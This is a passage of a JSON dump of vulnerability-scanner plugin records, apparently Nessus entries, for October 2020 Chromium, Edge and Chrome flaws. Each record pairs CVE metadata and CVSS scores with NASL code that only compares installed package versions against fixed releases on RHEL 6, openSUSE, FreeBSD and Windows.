'rhel_extras_oracle_java_6': [\n 'rhel-6-desktop-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-for-hpc-node-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-server-aus-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-server-eus-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-server-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-workstation-restricted-maintenance-oracle-java-rpms',\n 'rhel-hpc-node-6-eus-restricted-maintenance-oracle-java-rpms'\n ],\n 'rhel_extras_sap_6': [\n 'rhel-sap-for-rhel-6-server-debug-rpms',\n 'rhel-sap-for-rhel-6-server-eus-debug-rpms',\n 'rhel-sap-for-rhel-6-server-eus-rpms',\n 'rhel-sap-for-rhel-6-server-eus-source-rpms',\n 'rhel-sap-for-rhel-6-server-rpms',\n 'rhel-sap-for-rhel-6-server-source-rpms'\n ],\n 'rhel_extras_sap_hana_6': [\n 'rhel-sap-hana-for-rhel-6-server-debug-rpms',\n 'rhel-sap-hana-for-rhel-6-server-eus-debug-rpms',\n 'rhel-sap-hana-for-rhel-6-server-eus-rpms',\n 'rhel-sap-hana-for-rhel-6-server-rpms',\n 'rhel-sap-hana-for-rhel-6-server-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nvar enterprise_linux_flag = rhel_repo_sets_has_enterprise_linux(repo_sets:repo_sets);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'chromium-browser-86.0.4240.183-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation', 'rhel_extras_6', 'rhel_extras_hpn_6', 'rhel_extras_oracle_java_6', 'rhel_extras_sap_6', 'rhel_extras_sap_hana_6']},\n {'reference':'chromium-browser-86.0.4240.183-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation', 'rhel_extras_6', 'rhel_extras_hpn_6', 'rhel_extras_oracle_java_6', 'rhel_extras_sap_6', 'rhel_extras_sap_hana_6']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp']) && !enterprise_linux_flag) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:38:40", "description": "This update for chromium fixes the following issues :\n\n - Update to 86.0.4240.111 boo#1177936\n\n - CVE-2020-16000: Inappropriate implementation in Blink.\n\n - CVE-2020-16001: Use after free in media.\n\n - CVE-2020-16002: Use after free in PDFium.\n\n - CVE-2020-15999: Heap buffer overflow in Freetype.\n\n - CVE-2020-16003: Use after free in printing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-1737)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1737.NASL", "href": "https://www.tenable.com/plugins/nessus/141929", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1737.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141929);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-1737)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\n - Update to 86.0.4240.111 boo#1177936\n\n - CVE-2020-16000: Inappropriate implementation in Blink.\n\n - CVE-2020-16001: Use after free in media.\n\n - CVE-2020-16002: Use after free in PDFium.\n\n - CVE-2020-15999: Heap buffer overflow in Freetype.\n\n - CVE-2020-16003: Use after free in printing.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1177936\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-86.0.4240.111-lp152.2.42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-86.0.4240.111-lp152.2.42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-86.0.4240.111-lp152.2.42.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-86.0.4240.111-lp152.2.42.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:38:21", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 86.0.622.51. It is, therefore, affected by multiple vulnerabilities as referenced in the ADV200002-10-22-2020 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-22T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 86.0.622.51 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_86_0_622_51.NASL", "href": "https://www.tenable.com/plugins/nessus/141815", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141815);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 86.0.622.51 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 86.0.622.51. It is, therefore, affected\nby multiple vulnerabilities as referenced in the ADV200002-10-22-2020 advisory. Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?083510ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 86.0.622.51 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16003\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '86.0.622.51' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:39:30", "description": "Chrome Releases reports :\n\nThis release includes 5 security fixes :\n\n- [1125337] High CVE-2020-16000: Inappropriate implementation in Blink. Reported by amaebi_jp on 2020-09-06\n\n- [1135018] High CVE-2020-16001: Use after free in media. Reported by Khalil Zhani on 2020-10-05\n\n- [1137630] High CVE-2020-16002: Use after free in PDFium. Reported by Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi'anxin Group on 2020-10-13\n\n- [1139963] High CVE-2020-15999: Heap buffer overflow in Freetype.\nReported by Sergei Glazunov of Google Project Zero on 2020-10-19\n\n- [1134960] Medium CVE-2020-16003: Use after free in printing.\nReported by Khalil Zhani on 2020-10-04", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-22T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (f4722927-1375-11eb-8711-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F4722927137511EB87113065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/141790", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141790);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (f4722927-1375-11eb-8711-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chrome Releases reports :\n\nThis release includes 5 security fixes :\n\n- [1125337] High CVE-2020-16000: Inappropriate implementation in\nBlink. Reported by amaebi_jp on 2020-09-06\n\n- [1135018] High CVE-2020-16001: Use after free in media. Reported by\nKhalil Zhani on 2020-10-05\n\n- [1137630] High CVE-2020-16002: Use after free in PDFium. Reported by\nWeipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi'anxin\nGroup on 2020-10-13\n\n- [1139963] High CVE-2020-15999: Heap buffer overflow in Freetype.\nReported by Sergei Glazunov of Google Project Zero on 2020-10-19\n\n- [1134960] Medium CVE-2020-16003: Use after free in printing.\nReported by Khalil Zhani on 2020-10-04\");\n # https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?908ce031\");\n # https://vuxml.freebsd.org/freebsd/f4722927-1375-11eb-8711-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1813a7fb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<86.0.4240.111\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:39:44", "description": "The version of Google Chrome installed on the remote Windows host is prior to 86.0.4240.111. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_10_stable-channel-update-for-desktop_20 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Google Chrome < 86.0.4240.111 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_86_0_4240_111.NASL", "href": "https://www.tenable.com/plugins/nessus/141573", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141573);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Google Chrome < 86.0.4240.111 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 86.0.4240.111. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_10_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?908ce031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1125337\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1135018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1137630\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1139963\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1134960\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 86.0.4240.111 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16003\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'86.0.4240.111', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:39:23", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:4351 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\n - chromium-browser: Inappropriate implementation in Blink (CVE-2020-16000)\n\n - chromium-browser: Use after free in media (CVE-2020-16001)\n\n - chromium-browser: Use after free in PDFium (CVE-2020-16002)\n\n - chromium-browser: Use after free in printing (CVE-2020-16003)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-28T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2020:4351)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:chromium-browser"], "id": "REDHAT-RHSA-2020-4351.NASL", "href": "https://www.tenable.com/plugins/nessus/142008", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4351. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142008);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"RHSA\", value:\"2020:4351\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2020:4351)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:4351 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\n - 